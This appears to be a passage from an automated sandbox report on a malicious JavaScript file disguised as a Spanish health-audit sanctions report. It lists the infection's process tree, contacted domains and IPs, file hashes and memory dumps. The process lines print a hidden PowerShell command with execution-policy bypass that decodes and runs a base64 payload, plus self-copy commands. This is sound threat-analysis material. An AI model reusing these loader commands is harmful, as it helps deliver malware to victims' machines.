| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='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';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\agnosticism.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\agnosticism.js
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\agnosticism.js"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='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';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | deadpoolstart.lovestoblog.com | udp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| US | 207.241.224.2:443 | archive.org | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
| US | 207.241.224.2:443 | archive.org | tcp |
| CO | 181.131.217.63:7021 | deadpoolstart2064.duckdns.org | tcp |
| GB | 185.27.134.165:80 | deadpoolstart.lovestoblog.com | tcp |
Files
memory/1620-0-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/1620-9-0x0000021E8D6C0000-0x0000021E8D6E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_moyeartk.5o1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1620-10-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/1620-11-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/1620-12-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/1620-13-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/1620-14-0x0000021EAE370000-0x0000021EAE6EE000-memory.dmp
memory/1620-15-0x0000021E8D0F0000-0x0000021E8D0FE000-memory.dmp
C:\Users\Public\Downloads\agnosticism.js
| MD5 | 9b49b1a2e0327767db6dc4883654dd22 |
| SHA1 | 486be1d6c5d4f2f6d7b80613aeae32ed3a7a69ba |
| SHA256 | 761b67f0715d7f89c50cdb2dd4a18a49952a21d301907bafbaf0942179afdb30 |
| SHA512 | b473926aa77d0827eefeafc7ee8a59989e936ef3c0b7b316b0ab5eb7a34a993c2734419c7a80c8505904dcdb31c672156f33fe6e26084b3d8e8c1b565f6bc206 |
memory/1620-20-0x0000021EA5860000-0x0000021EA5870000-memory.dmp
memory/4552-19-0x0000000000400000-0x000000000040E000-memory.dmp
memory/4552-23-0x0000000005790000-0x000000000582C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8db89638d25eb835085ddae51b7df0ff |
| SHA1 | 6b06c8b024f2b5bbcb0ca2323aac080ca2b101dd |
| SHA256 | b76abef376e058bbf246be196a0de223552b11bce715cf65f6073f678164de35 |
| SHA512 | 64919bb2796afcd347264233053d7275c8171e544ce02313f21a77d26bdbfc5af0e9ab069cb256d1ce1996019c6fb320a5880bb4556ef0748ef3bf8dd17e05e8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7b5fe43dda2544ecf1948d765ad2a49a |
| SHA1 | b9a52f5a2981e7dcc1046e91fd3f78e216bf9578 |
| SHA256 | 5d441b6c6a153bed01c7e976a0f82e67e38f043f8b0296ae56a57024a7441830 |
| SHA512 | 8146dc9526ebba7fcd7c8258759a6212cac27fc70afe1ddc712409d1af757cef4d7944aa2856962d8f05c0f569fe9b3e2302d7ca42d6f3f49d085b12ef46a926 |
memory/4552-34-0x0000000005DF0000-0x0000000005E56000-memory.dmp
memory/4552-35-0x0000000006910000-0x00000000069A2000-memory.dmp
memory/4552-36-0x0000000006F60000-0x0000000007506000-memory.dmp